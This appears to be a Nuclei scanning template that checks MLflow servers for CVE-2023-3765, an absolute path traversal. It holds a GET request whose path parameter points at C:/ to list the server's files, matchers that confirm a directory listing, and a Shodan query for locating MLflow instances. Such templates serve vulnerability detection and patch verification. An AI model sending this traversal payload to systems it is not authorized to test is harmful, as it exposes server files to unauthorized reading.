id: CVE-2023-3765 info: name: MLflow Absolute Path Traversal author: DhiyaneshDK severity: critical description: | Absolute Path Traversal in GitHub repository mlflow/mlflow prior to 2.5.0. reference: - https://www.tenable.com/cve/CVE-2023-3765 - https://huntr.dev/bounties/4be5fd63-8a0a-490d-9ee1-f33dc768ed76 - https://nvd.nist.gov/vuln/detail/CVE-2023-3765 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10.0 cve-id: CVE-2023-3765 cwe-id: CWE-36 metadata: max-request: 1 verified: true shodan-query: http.title:"mlflow" tags: cve,cve2023,mflow,lfi,huntr http: - method: GET path: - "{{BaseURL}}/ajax-api/2.0/mlflow-artifacts/artifacts?path=C:/" matchers-condition: and matchers: - type: word words: - '"is_dir":' - '"path":' - '"files":' condition: and - type: word part: header words: - application/json - type: status status: - 200